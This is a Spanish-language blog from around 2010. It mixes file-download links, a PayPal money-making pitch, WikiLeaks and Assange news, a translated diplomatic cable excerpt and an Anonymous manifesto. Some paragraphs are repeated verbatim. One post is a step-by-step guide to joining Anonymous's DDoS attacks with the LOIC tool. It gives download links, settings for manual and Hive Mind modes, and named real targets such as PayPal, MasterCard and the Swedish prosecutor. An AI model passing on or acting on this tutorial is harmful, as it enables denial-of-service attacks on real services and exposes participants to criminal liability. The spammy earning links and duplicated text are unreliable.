Posted by Star | Posted in | Posted on 17:51
Formato: .PDF | Páginas: Entre 16 a 21 cada una | Idioma/Lenguaje: Castellano/Español | Tamaño: Entre 800 KB y 1, 20 MB cada una | Comprimido en 1 Parte (6, 42 MB)
Descargar:
http://www.megaupload.com/?d=4AR1Z5D0
http://www.megaupload.com/?d=4AR1Z5D0
Posted by Star | Posted in | Posted on 18:19
Si sabes lo que es alertpay o paypal ya estas listo para ganar dinero por internet, si no sabes averigua en internet y crea una cuenta en paypal o alertpay.
Si quieres ganar euros aca esta la solucion, dale click a la imagen:
Si quieres ganar dollars dale click a la imagen:
Tambien aca:
Cualquier duda dejenme un comentario.
Si quieres ganar euros aca esta la solucion, dale click a la imagen:
Si quieres ganar dollars dale click a la imagen:
Tambien aca:
Cualquier duda dejenme un comentario.
Posted by Star | Posted in | Posted on 11:21
La organización Wikileaks, que hace unos días divulgó cientos de miles de documentos sobre la guerra en Irak, dio a conocer hoy un vídeo supuestos abusos a civiles cometidos por las tropa estadounidenses.
El vídeo ha sido facilitado a la cadena británica Channel 4, que tiene previsto emitir un amplio reportaje hoy al respecto en el programa 'Dispatches'.
Como anticipo, la organización y el canal han difundido un extracto de 12 minutos del programa, en el que se han compilado declaraciones de los presidentes George W. Bush y Barack Obama referidas a la guerra en Irak, y materiales de archivo.
En la grabación se ven breves segmentos de vídeo con imágenes filmadas desde helicópteros militares estadounidenses.
En uno de los vídeos, la tripulación de un helicóptero solicita autorización para disparar contra un edificio en el cual se sospechaba la presencia de insurgentes iraquíes, aunque no se les ve en la imagen.
Cuando los tripulantes del helicóptero reciben autorización para disparar un misil Hellfire, un peatón sin armas cruza frente al edificio y su imagen desaparece en la explosión del proyectil.
En otro de los vídeos que, según Wikileaks, forman parte del acervo documental, se ve un automóvil blanco que transita por una carretera seguido desde la altura por helicópteros militares estadounidenses.
El automóvil se detiene, y un hombre sale de él, sin armas y con los brazos en alto. De inmediato al menos dos misiles aire-tierra estallan junto al automóvil y el hombre desaparece.
El locutor hace referencia a otro incidente, aunque no hay vídeo que acompañe la versión, en el cual un par de presuntos insurgentes iraquíes intentan rendirse.
El tripulante del helicóptero desde donde se hace la filmación pide asesoramiento legal y un abogado militar le indica que los iraquíes no pueden rendirse a una aeronave por lo cual siguen siendo un blanco válido.
Según el locutor los dos hombres murieron alcanzados por misiles.
El documental consiste de un montaje de breves vídeos, supuestamente inéditos y no difundidos hasta ahora, con imágenes de archivo desde la invasión estadounidense de Irak en marzo de 2003, incluidas imágenes de los abusos cometidos contra presos iraquíes en Abu Ghraib en 2004.
Posted by Star | Posted in | Posted on 17:12
Para lo que quieran solucionar los problemas con la camara en el msn solo descarguen esto:
MI PC > DISCO LOCAL C > ARCHIVOS DE PROGRAMA > WINDOWS LIVE > MESSENGER y en la carpeta MESSENGER pegan los archivo y listo todo estara solucionado.
Cualquier duda aqui estoy.
Posted by Star | Posted in | Posted on 21:13
Los de arriba están utilizando todo su poder para cortarnos los canales de comunicación. Ya nos han inhabilitado unos cuantos servidores, pero por suerte hay muchos más. Si nos lo bloquean se volverá a poner otro que funcione lo más pronto posible.
2. UNA VEZ INSTALADO ÁBRELO Y HAZ CLIQ EN
Archivo>Seleccionar Servidor>Añadir
3. DONDE PONE Descripción Y Servidor IRC
ESCRIBE EL SERVIDOR (en los 2 sitios), QUE ES:
67.23.234.51
3. AHORA HAZ DOBLE CLIQ EN EL SERVIDOR QUE ACABAS DE AÑADIR:
67.23.234.51
67.23.234.51
4. RELLENA LAS CASILLAS Nombre, Dirección de Mail Y Nick CON LO QUE QUIERAS Y HAZ CLIQ EN CONECTAR (SI NO FUNCIONA A LA PRIMERA, INSISTE).
5. TE APARECERÁ UNA VENTANA. DONDE PONE Nombre de canal ESCRIBE:
hispano
hispano
Posted by Star | Posted in | Posted on 9:47
La Fiscalía sueca apeló este martes la decisión del juez Howard Riddle de otorgar la libertad bajo fianza para el editor australiano. Ha sido un día de sobresaltos en el Tribunal de Westminster que le juzga. Por unas horas, todo apuntaba a que sería puesto en libertad, según comunicaron sus propios abogados. La noticia se aguó en apenas dos horas. La alegría que embargaba a los más de 100 manifestantes congregados frente al tribunal que tramita su solicitud de extradición se convirtió en decepción al conocerse la apelación de la Fiscalía sueca. Assange permanecerá en prisión hasta que se produzca una nueva vista del caso en las próximas 48 horas.
"Esto se está convirtiendo en un juicio espectáculo", ha declarado Mark Stephens, abogado de Assange. El juez de la Corte de magistrados de Westminster que tramita la solicitud de extradición por presuntos delitos de índole sexual otorgó una libertad sometida a tres condiciones fundamentales: fianza de 282.000 euros (240.000 libras), obligatoriedad para Assange de portar un brazalete electrónico de control y retención del pasaporte. Pero la fiscal Gemma Lindfield, en representación de las autoridades suecas, apeló la decisión del juez, motivo por el cual se celebrará una nueva vista.
El abogado Stephens clamó ayer contra las condiciones en que se encuentra detenido su cliente. "Assange es un hombre inocente en condiciones dickensianas, victorianas, en la prisión de Wandsworth", ha asegurado. En el caso Assange emergen referencias a Dickens, pero también a Orwell.
El fundador de Wikileaks, web que ha destapado 250.000 cables secretos del Departamento de Estado norteamericano, recibía en el juzgado el apoyo en Westminster del cineasta Ken Loach, del escritor y documentalista John Pilger y de la activista pro derechos humanos Bianca Jagger.
Saliendo apresurado de entre la nube de fotógrafos y cámaras que cubren el caso Assange, Ken Loach hacía unas declaraciones a este periódico momentos antes de que se conociera la apelación de la Fiscalía sueca: "Le han otorgado la libertad bajo fianza, que es la decisión correcta. Si el Gobierno sueco apela, eso pondrá de manifiesto que hay una motivación política detrás de todo esto. Si desafían lo que es judicialmente adecuado, demostrarán que hay una agenda política oculta". Ken Loach es uno de los ilustres que se han mostrado dispuestos a aportar fondos para la fianza: también lo han hecho la millonaria Jemima Khan y el cineasta norteamericano Michael Moore.
Los abogados de Assange sostienen que todo este proceso obedece a una maniobra de dilación para permitir que los fiscales norteamericanos puedan formular cargos por espionaje contra el editor australiano. Aseguran que lo que pretenden las autoridades suecas es extraditarlo a Estados Unidos. Stephens relató que su cliente se encuentra confinado en su celda durante 23 horas al día. No recibe ningún tipo de comunicación del exterior. No tiene acceso a Internet; ni a la prensa.
"Mis convicciones no se debilitan. Me mantengo fiel a los ideales que he expresado", ha declarado Assange a través de su madre antes de dirigirse al tribunal. El australiano emitía un comunicado que transmitió su madre, Christine, que acaba de llegar de Australia para apoyarle. El ideólogo de la web de las filtraciones mandaba un mensaje al mundo para que se proteja la labor que está haciendo. Un mensaje que no ha caído en saco roto. Son muchos los apoyos que está recibiendo del exterior.
Entre ellos, el del colectivo de ciberactivistas Anonymous. Una integrante de este grupo hablaba por la mañana con este periódico en el otro extremo de la ciudad. Se hace llamar Philter y tiene 19 años.
Asegura que existen en este momento dos facciones en Anonymous: una que defiende la necesidad de seguir atacando a MasterCard y otras empresas que han cortado el grifo a Wikileaks; y otra que sostiene que hay que liberar aquellos cables que aún no han sido difundidos. "Es lo que Assange hubiera deseado que hiciéramos", ha dicho en referencia a esta segunda opción.
De hecho, horas después se producía una escena curiosa frente al juzgado de Westminster. Sobre las cuatro de la tarde, dos activistas irrumpían entre la larga fila de agentes de policía que custodiaban la entrada y soltaron al aire docenas de cables. Tres policías se apresuraron a retirarlos del suelo con sus botas.
Mientras Assange comparecía en el interior, la tarde transcurría entre proclamas de los activistas pro-Wikileaks, que portaban máscaras y camisetas con el rostro del australiano y pancartas que pedían su libertad y la retirada de tropas de Afganistán. "Esto no es 1984", rezaba la pancarta que sostenía una joven, en alusión a la novela de George Orwell.
Posted by Star | Posted in | Posted on 22:23
Ya era hora de que los estados tuvieran esta rama de la informática más en cuenta y bastó el último granito de arena por parte de Wikileaks para que desencadenase todo tipo de polémicas gubernamentales y se pusieran medidas. Nada más ni nada menos que 30.000 personas dedicadas para formar en conjunto lo que será el primer comando militar cibernético, siendo el artífice de dicha iniciativa el Pentágono para servír al ejército de los Estados Unidos.
El comando estará bajo la supervisión del general Keith Alexander por nominación de Obama, siendo este el director de la Agencia de Seguridad Nacional, sede de la ubicación del mando en Fort Meade.
El objetivo principal de la formación de este nuevo grupo militar, es especializarse en la prevención de posibles ataques cibernéticos, teniendo incluso capacidad de hacer frente a redes informáticas enemigas o incluso aliadas si Estados Unidos así lo decidiera.
Alguna protesta fue recibida en especial por parte del senador Carl Levin, sosteniendo que el marco jurídico en temas de operaciones en Internet no ha evolucionado al mismo ritmo que los avances en tecnologías, pero no fueron suficientes como para detener la salida a la luz del comando.
Así que ya saben, crucemos los dedos para que suenen más puestos de trabajo para luchar contra amenazas informáticas, que sé que a más de uno le resulta interesante, mientras los españoles los seguimos cruzando para salir de la crisis.
Posted by Star | Posted in | Posted on 8:39
Desde hace aproximadamente hace una hora y media se está celebrando una nueva vista con Julian Assange como protagonista. Después de que el pasado martes en la primera vista se le denegara la libertad condicional hoy los abogados del australiano han logrado que el fundador de WikiLeaks sea puesto en libertad bajo fianza hasta la próxima vista, que se celebrará el próximo día 11 de enero.
Este hecho se produce después de que el abogado de Julian Assange haya proporcionado una dirección permanente en la que se encontrará Assange. No obstante, el magistrado ha puesto una serie de condiciones como la observación de un toque de queda, la retirada del pasaporte y la instalación de una pulsera electrónica en su muñeca.
La fianza que tendrán que abonar para que pueda quedar en libertad se ha fijado en 240.000 libras (282.720 euros) que deberán ser depositados en el juzgado de Westminster donde se está celebrando el juicio. A pesar de esta decisión del magistrado británico Assange no saldrá en libertad al menos hasta dentro de dos horas, ya que los fiscales suecos tienen ese plazo para poder presentar un recurso a esta decisión.
Este juicio a Julian Assange también pasará a la historia por ser el primero en ser contado en el Reino Unido a través de Twitter, algo que han estado haciendo varias personas dentro de la sala después de que Alexi Mostrous del diario The Times preguntase al juez Howard Riddle si podían twittear lo que sucediera en el juicio. Algo que ha sido aceptado por Howard con la condición de que lo hicieran en silencio y sin interrumpir.
Actualización I: El periódico The Guardian, que está haciendo una cobertura en vivo, nos trae más datos sobre las condiciones para la libertad de Julian Assange:
- Fianza de 240.000 libras
- Toque de queda de 10:00 a 14:00 y 22:00 a 02:00
- Assange debe informar a la comisaria todos los días a las 18:00
Actualización II: las cosas se acaban de poner bastante grises nuevamente. La fiscalía, a petición de Suecia, ha presentado recurso de apelación ante el Alto Tribunal del Reino Unido contra la decisión del tribunal de Westminster de concederle a Assange la libertad bajo fianza.
EE.UU TIENE MIEDO ANONYMOUS.
Posted by Star | Posted in | Posted on 11:52
ID: | 161421 | ||||||||||||||||||||||||||||||||||||||||||||||||
Date: | 2008-07-09 18:49:00 | ||||||||||||||||||||||||||||||||||||||||||||||||
Origin: | 08OTTAWA918 | ||||||||||||||||||||||||||||||||||||||||||||||||
Source: | Embassy Ottawa | ||||||||||||||||||||||||||||||||||||||||||||||||
Classification: | SECRET//NOFORN | ||||||||||||||||||||||||||||||||||||||||||||||||
Dunno: | 08OTTAWA360 08OTTAWA808 08OTTAWA850 08OTTAWA878 08TORONTO11 | ||||||||||||||||||||||||||||||||||||||||||||||||
Destination: | VZCZCXRO3160 OO RUEHGA RUEHHA RUEHMT RUEHQU RUEHVC DE RUEHOT #0918/01 1911849 ZNY SSSSS ZZH O 091849Z JUL 08 FM AMEMBASSY OTTAWA TO RUEHC/SECSTATE WASHDC IMMEDIATE 8157 INFO RUCNCAN/ALL CANADIAN POSTS COLLECTIVE PRIORITY RUEHBUL/AMEMBASSY KABUL PRIORITY 0198 RUEHIL/AMEMBASSY ISLAMABAD PRIORITY 0815 RUSBPW/AMCONSUL PESHAWAR PRIORITY 0098 RUEKJCS/JOINT STAFF WASHDC PRIORITY RUEKJCS/OSD WASHDC PRIORITY RHEHNSC/WHITE HOUSE NSC WASHINGTON DC PRIORITY RUEAIIA/CIA WASHDC PRIORITY RHMFISS/CDR USCENTCOM PRIORITY RUEAHLC/DEPT OF HOMELAND SECURITY WASHDC PRIORITY RUEKDIA/DIA WASHDC PRIORITY RHMFISS/HQ USNORTHCOM PRIORITY | ||||||||||||||||||||||||||||||||||||||||||||||||
S E C R E T SECTION 01 OF 03 OTTAWA 000918 C O R R E C T E D COPY//SUBJECT LINE////////////////////////////////// NOFORN SIPDIS E.O. 12958: DECL: 07/09/2018 TAGS: PREL, PTER, MOPS, IR, PK, AF, CA SUBJECT: COUNSELOR, CSIS DIRECTOR DISCUSS CT THREATS, PAKISTAN, AFGHANISTAN, IRAN REF: A. OTTAWA 360 B. OTTAWA 808 C. OTTAWA 850 D. OTTAWA 878 OTTAWA 00000918 001.2 OF 003 |
Traduccion al español de lo que significa parte de ese cable:
Seguridad Servicio Canadiense de Inteligencia
(CSIS) Director Judd discutido el terrorismo interno y externo
amenazas con el Consejero de Cohen del Departamento de Estado en
Ottawa, el 2 de julio. Judd admitió que CSIS era cada vez más
distraído de su misión por los desafíos legales que podrían
peligro de inteligencia extranjeros para compartir con los organismos canadienses.
Él predijo que el próximo lanzamiento de un DVD de
Detenido en Guantánamo y el ciudadano canadiense Omar Khadr
interrogado por funcionarios canadienses daría lugar a mayor
presión sobre el gobierno para presionar por su retorno a Canadá,
que el gobierno continuará a resistir. Judd compartida
Evaluación negativa del Dr. Cohen de la política actual,
las tendencias económicas y de seguridad en Pakistán, y estaba preocupado
sobre lo que significaría para la misión ISAF en Afganistán.
Canadá ha iniciado la formulación de una inter-agencia de Pakistán
estrategia, y el CSIS ha acordado abrir un canal para Irán
los servicios de inteligencia que Judd aún no ha "descubierto".
(Septel cubrirá los debates el Dr. Cohen sobre Pakistán
y la Operación Libertad Duradera y la ISAF las misiones en Afganistán resumen final.).
Pueden ver este cable completo:
Posted by Star | Posted in | Posted on 14:19
En estos momentos seguramente ya estáis al corriente de la “Ciberguerra” declarada por detractores y afines a Wikileaks.
Anonymous ha hecho circular hace pocas horas un mensaje en el que habría decidido abandonar los ataques DDoS y sustituirlos por acciones de protesta. El mensaje es el siguiente:
Aún ahora la estrategia principal de Anonymous se habría basado en lazar ataques tipo DDoS a todas las empresas que hubieran de alguna manera dejado de prestar servicio a Wikileaks a causa de la última gran filtración de la organización.
Es ahora cuando la estrategia cambia de rumbo, y personalmente, creo que será mucho más efectiva. El nuevo enfoque esta definido en la imagen superior, imagen que desde hace unas horas ya esta volando por la red. En ella pone lo siguiente:
Caballeros,
en el mejor de los casos, les hemos puesto un ojo morado.
El juego ha cambiado. Cuando el juego cambia, también deben hacerlo nuestras estrategias.Operación LeakspinComienza buscando en WikiLeaks
Encuentra sólo lo mejor, las filtraciones menos expuestas en las que puedas meter mano. Postea resúmenes de ellas, citando la fuente completa.
Anima al lector a leer más. Haz videos de uno o dos minutos en YouTube leyendo las filtraciones.
Usa etiquetas que engañen, de todo desde “Tea Party” hasta “Bieber”.
Publica fragmentos de las filtraciones en TODAS PARTES. Comentarios en noticias, en foros de fans, etc.Ellos no temen al LOIC.
Ellos temen la exposición pública.La diversión comienza, a las 9pm EST
Mí visión es que este cambio es mucho mejor a la hora de realizar estas acciones protesta, ya que realmente, los ataques de DDoS han sido más “ruido y pocas nueces” pero el animarnos a todos a la investigación y divulgación de los documentos mediante posts, videos, resúmenes… puede hacer mucho más daño.
Al igual que otros blogs yo también apoyo esta acción y animo a todos a colaborar y divulgar información referentes al “Cablegate” difundido por el País y los cables través de Wikileaks.
Londres. AFP.- "Las acciones de hoy en contra de nuestro redactor jefe Julian Assange no afectará a nuestras operaciones: difundiremos más cables esta noche como de costumbre", declaró WikiLeaks en la página de 'microblogging' Twitter.
Un periodista que trabaja para WikiLeaks declaró por su parte que el personal de la páginas web continuaba con sus tareas habituales.
"En términos de lo que está ocurriendo, todo va según lo previsto, todo seguirá saliendo como siempre", declaró a la AFP James Ball, que analiza documentos diplomáticos para WikiLeaks.
Assange, de 39 años, se entregó este martes por la mañana a la policía británica en Londres, que lo detuvo en cumplimiento de una orden de captura internacional emitida por la justicia sueca por sospechas de violación.
Los abogados británicos del australiano han dicho que las acusaciones suecas contra el fundador de Wikileaks pueden estar políticamente motivadas tras la filtración con cuentagotas de los comprometedores documentos.
Los intentos por silenciar a Assange y su página web se intensificaron en los últimos días, con el desalojo de la página de WikiLeaks de servidores en varios países, la cancelación de la cuenta que tenía para recibir donaciones en el popular portal de pagos por internet Paypal y el cierre de su cuenta bancaria en Suiza.
Cinco publicaciones en el mundo, entre ellos los diarios británico The Guardian, estadounidense The New York Times y español El País, han estado publicando a diario estos documentos desde hace 10 días y WikiLeaks dijo la semana pasada que tienen copias de muchos de los cables.
Assange también anunció días atrás que envió miles de cables codificados que podrían ser difundidos en caso de que él o su página web fueran silenciados.
"El archivo cablegate ha sido diseminado (...) a más de 100.000 personas de manera codificada. Si nos ocurre algo, las partes clave serán divulgadas automáticamente", dijo la semana pasada en una charla con lectores del diario The Guardian en la que prometió que "la historia ganará".
Fuente: Detención de Assange no afecta operaciones de WikiLeaks
Yo creo que es algo que nos afecta, o nos va a afectar a todos tarde o temprano. Estamos perdiendo poco a poco, nuestros "derechos humanos"(lo pongo entre comillas porque lo considero algo relativo),o por lo menos los pocos derechos que nos quedan, como la libertad de expresion, que desde hace ya un buen tiempo siempre fue un "si podes decir lo que quieras, pero bancate lo que te pueda pasar despues".
Yo lo veo de otra manera, mas que preguntarnos si queremos brindar nuestro apoyo a Wikileaks, deberiamos preguntarnos si vamos a seguir dejando que nos pasen por arriba, y se cagen literalmente en nuestros derechos como personas.
Un periodista que trabaja para WikiLeaks declaró por su parte que el personal de la páginas web continuaba con sus tareas habituales.
"En términos de lo que está ocurriendo, todo va según lo previsto, todo seguirá saliendo como siempre", declaró a la AFP James Ball, que analiza documentos diplomáticos para WikiLeaks.
Assange, de 39 años, se entregó este martes por la mañana a la policía británica en Londres, que lo detuvo en cumplimiento de una orden de captura internacional emitida por la justicia sueca por sospechas de violación.
Los abogados británicos del australiano han dicho que las acusaciones suecas contra el fundador de Wikileaks pueden estar políticamente motivadas tras la filtración con cuentagotas de los comprometedores documentos.
Los intentos por silenciar a Assange y su página web se intensificaron en los últimos días, con el desalojo de la página de WikiLeaks de servidores en varios países, la cancelación de la cuenta que tenía para recibir donaciones en el popular portal de pagos por internet Paypal y el cierre de su cuenta bancaria en Suiza.
Cinco publicaciones en el mundo, entre ellos los diarios británico The Guardian, estadounidense The New York Times y español El País, han estado publicando a diario estos documentos desde hace 10 días y WikiLeaks dijo la semana pasada que tienen copias de muchos de los cables.
Assange también anunció días atrás que envió miles de cables codificados que podrían ser difundidos en caso de que él o su página web fueran silenciados.
"El archivo cablegate ha sido diseminado (...) a más de 100.000 personas de manera codificada. Si nos ocurre algo, las partes clave serán divulgadas automáticamente", dijo la semana pasada en una charla con lectores del diario The Guardian en la que prometió que "la historia ganará".
Fuente: Detención de Assange no afecta operaciones de WikiLeaks
Yo creo que es algo que nos afecta, o nos va a afectar a todos tarde o temprano. Estamos perdiendo poco a poco, nuestros "derechos humanos"(lo pongo entre comillas porque lo considero algo relativo),o por lo menos los pocos derechos que nos quedan, como la libertad de expresion, que desde hace ya un buen tiempo siempre fue un "si podes decir lo que quieras, pero bancate lo que te pueda pasar despues".
Yo lo veo de otra manera, mas que preguntarnos si queremos brindar nuestro apoyo a Wikileaks, deberiamos preguntarnos si vamos a seguir dejando que nos pasen por arriba, y se cagen literalmente en nuestros derechos como personas.
Posted by Star | Posted in | Posted on 15:45
Español
Nuestro mensaje, intenciones y objetivos potenciales
"Aquellos que niegan la libertad a los demás, no la merecen para ellos mismos."
- Abraham Lincoln
"Aquel que sacrifica la libertad por seguridad, no merece ninguna de las dos."
– Benjamin Franklin
Hola, mundo. Somos Anonymous. Lo que sepáis o no sepáis sobre nosotros es irrelevante. Hemos decidido escribiros a vosotros, a los medios a todos los ciudadanos y ciudadanas del mundo libre para informaros de nuestro mensaje, nuestras intenciones, objetivos potenciales y la campaña que hemos puesto en marcha por la libertad.
"Esto es cierto —
Bajo el imperio de los grandes hombres
La pluma es más poderosa que la espada."
- Richelieu o la Conspiración, Edward Bulwer-Lytton
El mensaje es simple: Libertad de Expresión. Anonymous está haciendo una campaña pacífica por la Libertad de Expresión en todas partes y en todas sus formas. Libertad de expresión para: Internet, el periodismo y los periodistas y los ciudadanos de todo el mundo. Al margen de lo que pienses o quieras expresar: Anonymous está haciendo campaña por ti.
Las recientes noticias sobre nuestras campañas han sido, en el mejor de los casos, mal informadas. Anonymous no es siempre el mismo grupo de gente. Se dice de la Constitución de los Estados Unidos que es un documento vivo, porque se puede editar, enmendar, modificar conforme a la voluntad del pueblo para acomodarse a las necesidades del pueblo. De la misma forma, Anonymous es una idea viva. Anonymous es una idea que se puede editar, actualizar, enmendar, cambiar en un instante. Somos una conciencia viva. No somos una organización terrorista como los gobiernos, los demagogos y los medios os querrán hacer creer. En este momento Anonymous es una conciencia concentrada en una campaña pacífica por la Libertad de Expresión. Pedimos al mundo que nos apoye, pero no por nosotros, sino por vosotros mismos. Cuando los gobiernos controlan la libertad os controlan a vosotros. Internet es el último bastión de libertad en este mundo tecnológico en constante evolución. Internet es capaz de conectarnos a todos. Cuando estamos conectados somos fuertes. Cuando somos fuertes tenemos poder. Cuando tenemos poder somos capaces de hacer lo imposible. Por eso es por lo que el gobierno está actuando sobre Wikileaks. Esto es lo que temen. Tienen miedo a nuestro poder cuando estamos unidos. No olvidemos esto.
"…Debemos temer a los hombres malvados. Pero no hay maldad que debamos temer más que la indiferencia de los hombres buenos."
- Monseñor, Boondock Saints
Las intenciones de Anonymous son claras. No somos vigilantes, a pesar de la cita de Boondock Saints, somos personas en una campaña por la libertad. La intención de Anonymous es cambiar la visión que actualmente tienen los gobiernos y la gente sobre la verdadera Libertad de Expresión e Internet. Anonymous está dispuesto, preparado y capaz para hacer campaña por la libertad de todos y todas. Estamos en campaña ahora mismo, mientras lees las noticias, ves televisión, discutes con tu pareja, quieres a tus hijos, odias a tu vecino, criticas a la persona que tienes al lado. Estamos en campaña. El objetivo es simple: ganar el derecho a mantener Internet libre de todo control por parte de ninguna entidad, corporación o gobierno. Haremos esto mientras nos quede aliento. No lo hacemos por nosotros mismos, sino por todo el mundo y sus gentes.
"La verdad es tomada por traición en el imperio de la mentira."
- Ron Paul
Prestad atención ciudadanos, gobiernos, mundo. La campaña pacífica de Anonymous se centrará en cualquier organización, corporación, gobierno o entidad hasta que Internet sea verdaderamente libre.
Anonymous está haciendo lo que muchas campañas exitosas han hecho antes: una sentada. Puede que sea difícil de comprender, pero una sentada digital es la forma más eficaz de mostrar que todos y todas merecemos la Libertad de Expresión y un Internet libre. Nuestro métodos pueden parecer, desde fuera, crueles con las entidades a las que se dirgie nuestra campaña, pero recordad que apoyando a la censura, lo que están haciendo es negarnos a todos un derecho humano fundamental. Cualquier persona, corporación, gobierno o entidad que deje de apoyar a la censura y comience a promover la Libertad de Expresión y un Internet libre se convertirá en nuestro aliado. Anonymous, en este momento, quiere persuadirlos en lugar de dañarlos. Estamos en campaña por la libertad de todos, incluso de quienes se nos oponen.
No nos temáis. La campaña de Anonymous no pretende dañar a ningún ciudadano individual, ni organización, página web o gobierno que apoye una verdadera libertad de expresión. El pasado de Anonymous no es nuestro futuro. Estamos aquí por todos vosotros, para hacer campaña por todos vosotros. Donde otros han prometido y fracasado, nosotros mantenemos esta promesa y perseveraremos, por todos.
No todo lo que se atribuye a Anonymous es obra nuestra. No somos la misma conciencia a cada hora, mes o año. No creáis todo lo que oís o leéis en las noticias. A Anonymous a menudo se le atribuyen acciones que no pertenecen a la campaña de Anonymous. El núcleo verdadero de Anonymous está aquí para ayudar al mundo libre. Anonymous desea representar la verdad y pide lo mismo de los ciudadanos, los medios y los gobiernos.
Atencion !!!!
Cambios de planes: operacion Leaksping
Lee arriba del blog.
Hola gente.
Bueno como ya sabrán
El grupo Anonymous está "atacando" diferentes objetivos en internet, como por ejemplo el
Somos legión. No perdonamos. No olvidamos.
Para participar de este contra-ataque solamente hay que bajarse el
Lo ideal es bajarse la versión 1.1.1.14 que es la versión que se conecta con el canal del grupo Anonymous y se autoconfigura para atacar el objetivo que el grupo ha especificado.
Actualmente ese canal también está siendo atacado, seguramente por el pentágono yanqui a través de su grupo de guerra electrónica, por lo que puede ser que no logre conectarse para obtener los parámetro necesarios para producir el ataque. En ese caso la configuración deberá hacerse manualmente, no se preocupen que esto es extremadamente fácil.
Una aclaración, alguien puede pensar que estos ataques son una boludés que no producirán ningún efecto...
Bien ahora a lo nuestro, por desgracia en la
Se baja un pequeño archivo
Antes que nada les aviso que una vez que comienza el ataque se satura la conexión a internet, por lo que les recomiendo que solamente lo usen cuando no la estén usando.
Para realizar un ataque es muy simple, en el campo donde dice "IRC
Debido a que el sitio que sirve como coordinador del ataque global también está siendo atacado, puede ser que no se pueda conectar. En este caso deberemos configurar manualmente los parámetro antes, para esto hay que tildar la casilla "Manual Mode" y en el campo que dice "URL" hay que introducir la dirección web del sitio objetivo.
Lamentablemente si el sitio de coordinación (anonops.net) está inaccesible no podremos saber cual es el objetivo del momento, tendremos que buscar en otros sitios, foros, blog o noticias para saberlo... pero siempre serán las web de PayPal, MasterCard, tal vez de Visa en algún momento, de PostFinnance o de la fiscalía sueca que lleva adelante la acusación contra Assange.
Una vez que sabemos cual es el objetivo introducimos la dirección y le damos al botón "Lock On", aparecerá en números grandes la dirección IP de dicha página.
Luego tildamos las dos casillas; "Append random chars to the URL" y "Append random chars to the message" y en el campo que está debajo de esta casilla podemos escribir WikiLeaks o algo parecido.
En el campo "port" generalmente será
En la lista desplegable dejamos la opción "TCP" y finalmente el campo "Threads" será
Con esos datos ya estaríamos en condiciones de comenzar el ataque, entonces le damos al botón "IMMA CHARGIN MAH LAZER" yyyy.... Hasta la
Si la web ya no está saturada veremos como el contador "Requested" empezará a contar, cuando se detenga es porque el sitio finalmente cayó , y si directamente no responde es porque ya estaba chau
Vuelvo a repetir, atacar solo cuando no usemos la conexión a internet ya que el movimiento de datos es tan grande que queda inutilizada para nosotros también... si están con la compu prendida viendo una peli, una
Si están atacando en el modo HIVE MIND y Anonymous decidió cambiar el objetivo, el programa se auto re-configurará solo al nuevo objetivo. Si lo están haciendo en modo
Descargar Low Orbit:
http://www.megaupload.com/?d=RQFGBUW5
https://github.com/downloads/NewEraCracker/LOIC/loic.1.1.1.14.zip
Informes de los asarosos que nos tienen en la mira:
http://pandalabs.pandasecurity.com/es/el-grupo-ciberactivista-%E2%80%9Canonymous%E2%80%9D-convoca-un-ataque-contra-la-sgae-espanola-para-esta/
Posted by Star | Posted in | Posted on 12:06
BitDefender (compañía de seguridad), ha credo el primer antivirus para Facebook, llega en forma de aplicación con el nombre de SafeGo. De este modo, la aplicación se encargará de mantener el perfil y el ordenador ‘limpio’ de malware, además de obtener una valoración de privacidad que asegura si los datos son “presa fácil para el robo de datos personales”.
De momento, la aplicación no tiene todas las funciones disponibles (ya que esta en fase beta), pero, tal y como ha comunicado la compañía, incorporará la posibilidad de ver cuáles han sido las amenazas más recientes, revisará la bandeja de entrada de los mensajes privados y publicará en el muro de aquellos usuarios que la instalen un informe semanal sobre el estado de su cuenta.
De momento, la aplicación no tiene todas las funciones disponibles (ya que esta en fase beta), pero, tal y como ha comunicado la compañía, incorporará la posibilidad de ver cuáles han sido las amenazas más recientes, revisará la bandeja de entrada de los mensajes privados y publicará en el muro de aquellos usuarios que la instalen un informe semanal sobre el estado de su cuenta.
Recientemente, un estudio reveló que un 20% de los usuarios de Facebook está expuesto a contenido malicioso a través de las aplicaciones creadas en la red social, a través de ver vídeos o del famoso virus Koobface.
No lo tienes que instalar en tu PC ya que es una aplicación para Facebook.
Para activarlo, tienes que agregar la aplicación en tu cuenta de Facebook, abajo he colocado el enlace para la aplicación, una vez agregado tienes que configurar algunas cosas como Scan my inbox para que analice los mensajes de tu bandeja de entrada, Publish to wall con esta opción se va a publicar una alerta en tu muro avisándote que se ha detectado una nueva amenaza.
Posted by Star | Posted in | Posted on 20:13
Los expertos en seguridad alertan de la llegada de un nuevo troyano que promete dar mucha guerra en los próximos días. Se trata de Ares, que se presenta como un malware muy peligroso debido a su gran versatilidad.
Y es que el propio creador de este troyano ha confirmado que Ares no estará centrado sólo en atacar a la banca, sino que cada una de sus copias “puede ser única y puede configurarse en función del comprador”, lo cual multiplica las dificultades para su detección.
Y es que el propio creador de este troyano ha confirmado que Ares no estará centrado sólo en atacar a la banca, sino que cada una de sus copias “puede ser única y puede configurarse en función del comprador”, lo cual multiplica las dificultades para su detección.
También ha advertido que “tiene las mismas capacidades como troyano bancario que Zeus”, una de las amenazas más peligrosas, que a principios de noviembre consiguió pasar de los ordenadores a los móviles.
Pero los ciberdelincuentes no sólo van a poder utilizar este troyano para infectar equipos, sino que hay todo un kit de desarrollo circulando por el mercado negro del cibercrimen.
Este kit se vende de manera gratuita a “desarrolladores de confianza”, pero puede llegar a costar hasta 6.000 dólares a los ciberdelincuentes extraños. Si los cibercriminales no disponen de tanto presupuesto también pueden adquirir un “paquete de inicio”, con funciones reducidas, por 850 dólares.
Desde G-Data alertan de que Ares está a punto de iniciar su “distribución masiva”.
Pero los ciberdelincuentes no sólo van a poder utilizar este troyano para infectar equipos, sino que hay todo un kit de desarrollo circulando por el mercado negro del cibercrimen.
Este kit se vende de manera gratuita a “desarrolladores de confianza”, pero puede llegar a costar hasta 6.000 dólares a los ciberdelincuentes extraños. Si los cibercriminales no disponen de tanto presupuesto también pueden adquirir un “paquete de inicio”, con funciones reducidas, por 850 dólares.
Desde G-Data alertan de que Ares está a punto de iniciar su “distribución masiva”.
Posted by Star | Posted in | Posted on 21:45
Hasta la fecha lo que se conocía como malware era software que aprovechaba bugs de sistemas operativos y/o software muy común explotándolo con fines malintencionados como es la infección de equipos o bien el uso como ordenador zombie en botnets. Investigadores franceses acaban de hacer público un ejemplo de cómo es posible la creación de malware que afecta directamente a una CPU concreta, y que se vería en peligro sea cual fuere el sistema operativo sobre el que está trabajando.
